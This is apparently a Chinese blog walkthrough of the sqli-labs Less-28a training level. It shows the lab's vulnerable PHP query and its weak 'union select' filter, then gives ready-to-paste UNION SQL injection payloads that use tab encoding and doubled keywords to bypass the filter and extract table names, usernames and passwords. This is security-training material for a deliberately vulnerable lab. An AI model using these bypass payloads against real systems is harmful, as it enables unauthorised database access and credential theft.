sqli-labs:Less-28a关卡详细解析

1. 思路🚀

本关的SQL语句为:

sql 复制代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  • 注入类型:字符串型(单引号、括号包裹)、GET操作
  • 提示:参数需以')闭合
  • 关键参数:id

php输出语句的部分代码:

php 复制代码
if($row)
{
  	echo "<font size='5' color= '#99FF00'>";	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
}
else 
{
	echo '<font color= "#FFFF00">';
	// print_r(mysql_error());
	echo "</font>";  
}

语句print_r(mysql_error());被注释,本关卡不可以使用报错盲注。而且相比关卡28,对字符的过滤仅有unionselect,因此关卡28的解法可以拿来直接用,替换规则如下。(重点关注unionselect的过滤)

  • 空格%09替换
  • unionunion%09union替换
  • selectselect%09select替换
php 复制代码
function blacklist($id)
{
   //$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
   //$id= preg_replace('/[--]/',"", $id);				//Strip out --.
   //$id= preg_replace('/[#]/',"", $id);				//Strip out #.
   //$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
   //$id= preg_replace('/select/m',"", $id);	   		//Strip out spaces.
   //$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
   $id= preg_replace('/union\s+select/i',"", $id);	    //Strip out spaces.
   return $id;
}

2. 手工注入步骤🎯

我的地址栏是:http://localhost:8081/Less-28a/,从?id=开始,只需要将下面的sql语句粘贴即可。同时我将sql注入源语句和变体语句放在下面,方便观察。

2.1. 获取基本信息⚡

url 复制代码
999') union select 1,database(),3 where ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,database(),3%09where%09('1'='1

2.2. 获取表名⚡

url 复制代码
999') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' and ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,group_concat(table_name)%09,3%09from%09information_schema.tables%09where%09table_schema%09=%09'security'%09and%09('1'='1

2.3. 获取字段⚡

url 复制代码
999') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' and ('1'='1
url 复制代码
999')%09union%09union%09select%09select%091,group_concat(column_name)%09,3%09from%09information_schema.columns%09where%09table_schema%09=%09'security' and%09table_name%09=%09'users'%09and%09('1'='1

2.4. 获取数据⚡

url 复制代码
999') union select 1,group_concat(username),3 from users where ('1'='1
url 复制代码
# 账号
999')%09union%09union%09select%09select%091,group_concat(username),3%09from%09users%09where%09('1'='1
url 复制代码
# 密码
999')%09union%09union%09select%09select%091,group_concat(password),3%09from%09users%09where%09('1'='1

2.5. 参数汇总表⭐

参数 作用 示例
') 闭合符号 id=1')
union select 联合查询 union select 1,2,3
group_concat() 合并结果 group_concat(table_name)
information_schema 系统数据库 from information_schema.tables
table_schema 数据库名称 table_schema='security'
table_name 数据表名称 table_name='users'
column_name 字段名称 group_concat(column_name)

3. 总结🏁

关卡中代码对许多字符进行过滤来防止SQL注入,但我们仍可通过替换相应内容(如union%09union)、逻辑运算符替代或URL编码的方式等方式轻松绕过。

相似的关卡1解析,见"sqli-labs:Less-28关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149915055?spm=1011.2415.3001.5331

相似的关卡2解析,见"sqli-labs:Less-27a关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149914363?spm=1011.2415.3001.5331

基础的联合注入关卡解析,见"sqli-labs:Less-2关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149775774?spm=1011.2415.3001.5331


声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

相关推荐
mooyuan天天7 小时前
sqli-labs靶场安装与使用指导教程(3种方法:通用版、php7版、Docker版)
web安全·sql注入·数据库安全·sql注入漏洞·sqli-labs·sqli-labs靶场
敲上瘾6 天前
Linux I/O 多路复用实战:Select/Poll 编程指南
linux·服务器·c语言·c++·select·tcp·poll
Demonsong_9 天前
在职老D渗透日记day19:sqli-labs靶场通关(第26a关)get布尔盲注 过滤or和and基础上又过滤了空格和注释符 ‘)闭合
sql注入
菜根Sec12 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
布朗克16817 天前
MySQL UNION 操作符详细说明
数据库·mysql·union
16年上任的CTO19 天前
常见网络攻击类型及防护手段
网络攻击模型·ddos·xss·sql注入·网络防护·xsrf·arf
看天走路吃雪糕22 天前
sqli-labs:Less-24关卡详细解析
sql注入·sqli-labs·less-24·二次排序注入
看天走路吃雪糕23 天前
sqli-labs:Less-23关卡详细解析
sql注入·sqli-labs·报错盲注·less-23·注释符
看天走路吃雪糕23 天前
sqli-labs:Less-26关卡详细解析
sql注入·sqli-labs·报错盲注·or·less-26·and